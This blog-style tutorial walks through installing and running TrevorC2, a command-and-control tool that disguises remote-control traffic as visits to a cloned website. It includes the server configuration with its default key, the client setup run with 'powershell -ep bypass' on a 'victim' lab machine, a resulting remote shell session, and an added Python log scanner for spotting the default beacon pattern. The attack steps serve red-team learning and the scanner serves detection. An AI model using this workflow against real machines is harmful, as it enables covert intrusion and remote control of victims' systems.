I enjoy playing with new tools, and one that I’m fully aware of but haven’t had the chance to use is Dave Kennedy’s TrevorC2.
TrevorC2 is a client/server model for masking command and control through a normally browsable website. Detection becomes much harder as time intervals are different and does not use POST requests for data exfil. (Taken from the GitHub page)
This post is going to be a straightforward introduction to quickly installing and using the tool.
The tool can be found here: https://github.com/trustedsec/trevorc2
Installation is super simple.
Run the following from your terminal within Kali Linux.
    cd /opt
    git clone https://github.com/trustedsec/trevorc2.git
    cd trevorc2/
    pip install -r requirements.txt
Configuring the Server
Once installed, the TrevorC2 server will need to be configured.
Dave has made the trevorc2_server.py Python code very easy to understand with a comment about each configurable variable.
In my testing, I didn’t really need to change anything. It is, however, recommended that you change the encryption key.
Use whatever text editor you prefer and modify the trevorc2_server.py file as required. I would recommend changing the domain you would like to replicate and the encryption key.
    # CONFIG CONSTANTS:
    URL = ("https://www.google.com")  # URL to clone to house a legitimate website
    USER_AGENT = ("User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko")

    # THIS IS WHAT PATH WE WANT TO HIT FOR CODE - THIS CAN BE WHATEVER PATH YOU WANT
    ROOT_PATH_QUERY = ("/")

    # THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER
    SITE_PATH_QUERY = ("/images")

    # THIS IS THE QUERY STRING PARAMETER USED
    QUERY_STRING = ("guid=")

    # STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
    STUB = ("oldcss=")

    # Turn to True for SSL support
    SSL = False
    CERT_FILE = ""  # Your Certificate for SSL

    # THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY
    CIPHER = ("Tr3v0rC2R0x@nd1s@w350m3#TrevorForget")
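For defenders, the default values above are also what this traffic looks like in web or proxy logs. The following is an added example, not code from the TrevorC2 project or the original post: it scans constructed log lines for repeated GET requests to the default /images path carrying a long guid= value and reports the gaps between them. The log layout, the length threshold and the base64-like character set are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Defaults from trevorc2_server.py as shown above; an operator can change them all.
SITE_PATH_QUERY = "/images"
QUERY_PARAM = "guid"      # QUERY_STRING is "guid="
MIN_VALUE_LEN = 24        # assumption: encoded data is longer than a real id
BASE64ISH = re.compile(r"^[A-Za-z0-9+/=%_-]+$")  # assumption about the encoding
# Assumed log layout: ip - - [time] "METHOD target HTTP/x" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def find_default_beacons(lines, min_hits=3):
    """Map client IP -> seconds between matching requests, for clients that
    repeatedly send GET /images?guid=<long base64-like value>."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, target, _status = m.groups()
        url = urlsplit(target)
        if method != "GET" or url.path.rstrip("/") != SITE_PATH_QUERY:
            continue
        # Split by hand: parse_qs would turn "+" in base64 into a space.
        params = dict(p.split("=", 1) for p in url.query.split("&") if "=" in p)
        value = params.get(QUERY_PARAM, "")
        if len(value) >= MIN_VALUE_LEN and BASE64ISH.match(value):
            hits[ip].append(datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"))
    report = {}
    for ip, times in hits.items():
        if len(times) >= min_hits:
            times.sort()
            report[ip] = [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
    return report

# Constructed sample log lines (not captured traffic).
BLOB = "QUFB" * 8  # placeholder base64 text, 32 characters
SAMPLE_LOG = [
    f'192.168.0.8 - - [01/Jan/2024:10:00:02 +0000] "GET /images?guid={BLOB} HTTP/1.1" 200 512',
    '192.168.0.20 - - [01/Jan/2024:10:00:05 +0000] "GET /images?guid=42 HTTP/1.1" 200 900',
    f'192.168.0.8 - - [01/Jan/2024:10:00:09 +0000] "GET /images?guid={BLOB}QQ== HTTP/1.1" 200 512',
    f'192.168.0.8 - - [01/Jan/2024:10:00:21 +0000] "GET /images?guid={BLOB} HTTP/1.1" 200 512',
    '192.168.0.20 - - [01/Jan/2024:10:00:30 +0000] "GET / HTTP/1.1" 200 14000',
]

if __name__ == "__main__":
    print(find_default_beacons(SAMPLE_LOG))
```

The irregular gaps in the result are expected, since the client polls at random intervals; the check keys on the path and parameter shape rather than on a fixed period, and it only catches deployments that kept the default path and parameter name.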
Configuring the Client
All I had to modify within the trevorc2_client.ps1 code was the $SITE_URL variable. This is used to specify the URL/IP Address of the TrevorC2 server listening for connections.
    nano trevorc2_client.ps1

    $SITE_URL = "http://192.168.0.16"
Also modify the $CIPHER variable to match the one within the trevorc2_server.py file if you have changed it.
Starting the Server
Once the server and client files are configured, we’re going to start the server and start receiving agents.
Run the following to start the server:
    python trevorc2_server.py

    TrevorC2 - Legitimate Website Covert Channel
    Written by: David Kennedy (@HackingDave)
    https://www.trustedsec.com

    [*] Cloning website: https://www.google.com
    [*] Site cloned successfully.
    [*] Starting Trevor C2 Server...
    [*] Next, enter the command you want the victim to execute.
    [*] Client uses random intervals, this may take a few.
    [*] Type help for usage. Example commands, list, interact.
The server is running and now listening for connections (agents). As always, I’d recommend running the help command to understand what functionality you have.
Gaining a Shell
In reality, you would entice the victim to run the following code in some way. However, for this introduction, I will simply run the trevorc2_client.ps1 file on the victim machine.
    C:\Users\IEUser\Desktop>powershell -ep bypass
    Windows PowerShell
    Copyright (C) 2009 Microsoft Corporation. All rights reserved.

    PS C:\Users\IEUser\Desktop> . .\trevorc2_client.ps1
As shown, on the server side of things, we have an agent to interact with.
    trevorc2>
    *** Received connection from 192.168.0.8 and hostname IEWIN7 for TrevorC2.
    IEWIN7:trevorc2>ipconfig
    [*] Waiting for command to be executed, be patient, results will be displayed here...
    [*] Received response back from client...
    =-=-=-=-=-=-=-=-=-=-=
    (HOSTNAME: IEWIN7
    CLIENT: 192.168.0.8)

    Windows IP Configuration

    Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . :
       Link-local IPv6 Address . . . . . : fe80::80ac:4126:fa58:1b81%10
       IPv4 Address. . . . . . . . . . . : 192.168.0.8
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.0.1
Hopefully this gets you started. Huge thanks to Dave Kennedy for developing this awesome tool. Give him a follow if you don’t already (@HackingDave).